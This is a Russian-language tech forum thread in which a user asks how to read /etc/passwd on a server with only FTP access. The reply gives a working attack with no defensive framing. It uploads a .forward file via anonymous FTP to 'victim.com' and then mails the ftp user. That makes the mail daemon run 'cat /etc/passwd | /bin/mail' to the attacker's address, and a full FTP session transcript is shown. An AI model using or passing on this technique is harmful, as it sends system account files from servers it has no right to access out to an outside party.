June 29 2024 06:31:34
Навигация
· Генеральная
· Статьи
· Поиск

· Материнские платы
· Чипсеты, контроллеры
· CPU - процессоры
· Память - RAM
· Видеокарты
· HDD, SSD, FDD
· CD - DVD - BD
· Звуковые карты
· Охлаждение ПК
· Корпуса ПК
· Блоки питания, ИБП...
· Мониторы, телевизоры
· Клавиатуры, мыши...
· Ноутбуки, десктопы

· Интернет, модемы, LAN
· Принтеры, сканеры...
· Камеры фото-видео
· Мультимедиа
· Компьютеры - общая
· Программное обеспечение
· Игры ПК
· Справочники, радиодело
· Производители

· ГД - динамики, микрофоны
· Аппаратура

· Телевидение
· Безопасность - security
· Электроника / Быт
· Телефоны / мобильники
· Пульты - ПДУ
· Создание сайтов

· О сайте wasp.kz...

· Добавить новость
· Каталог ссылок
· Пресс-релизы
Последние статьи
· Апокалипсис и постап...
· Элементарно
· Спартак: Кровь и песок
· Infogrames выпустила...
· Интервью: Омар Шариф
· Что чаще всего ломае...
· НАТО – угроза миру!
· Thomson L42P60UF пла...
· 64-битный процессор?
· Покупка ноутбука - н...
Letzte Kommentare
News
И потому всем нам звон...
[big]Наша сторона не о...
Надо менять сперва ПРИ...
Ничего не изменится! Д...
В отличии от нацистско...
Artikel
Дрянной сериальчик - м...
Ну как там - продолжен...
На вид все вроде целое...
Насколько хорошо эта п...
Так по сути это одно и...
Fotos
И где все это теперь? ...
Она наверное еще и ков...
Осциллограф на машине ...
Хороший калькулятор - ...
И чем такой калькулято...
Eigene Seiten
Помню... молодой тогда...
Это явно халтура - пол...
Иллюстраций надо бы сю...
Полезный материал! Гла...
А вот теперь русские м...
Просмотр темы
Логин:
Пароль:  
Форум » ИНТЕРНЕТ, ЛОКАЛЬНЫЕ СЕТИ, САЙТЫ » Создание сайтов
Просмотр темы
Ответить
Иконка 
Как прочитать /etc/passwd?
Наверх Распечатать сообщение #1
Опубликовано 19-06-2024 11:15
Аватар пользователя

Новичок


Сообщений: 4
Вас поблагодарили: 0
раз(а) в 0 сообщениях

Зарегистрирован: 19.06.24
Со дня регистрации: 10

Пожаловаться на это сообщение 

Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd?

Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера


Код
bash# cat myforward_file
"cat /etc/passwd | /bin/mail hacker© mail.ru "
bash# ftp victim.com
Connected to victim.com
220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -l
220 PORT command succesful.
150 Opening ASCII mode data connection for '/bin/
Is'. (192.168.1.1, 2335) (0 bytes) total 4
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub
226 Transfer complete.
ftp>put myforward_file .forward
ftp>quit
bash# echo 'You a hacked' | mail ftp© victim.com




В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло


*

Изменил(а) wasp, 19-06-2024 12:11
 Offline
 
Цитировать
Ответить
Здесь присутствуют: 1 (пользователей: 0, гостей: 1)

« Предыдущая тема | Следующая тема »
 RSS Перейти на форум:
Авторизация
Логин

Пароль



Вы не зарегистрированы?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Реклама Google




Сейчас на сайте
· Гостей: 17

· Пользователей: 0

· Всего пользователей: 5,383
· Новый пользователь: Amirkz
Счетчики


Яндекс цитирования

Яндекс.Метрика

Время загрузки: 0.13 секунд - 120 Запросов 82,771,368 уникальных посетителей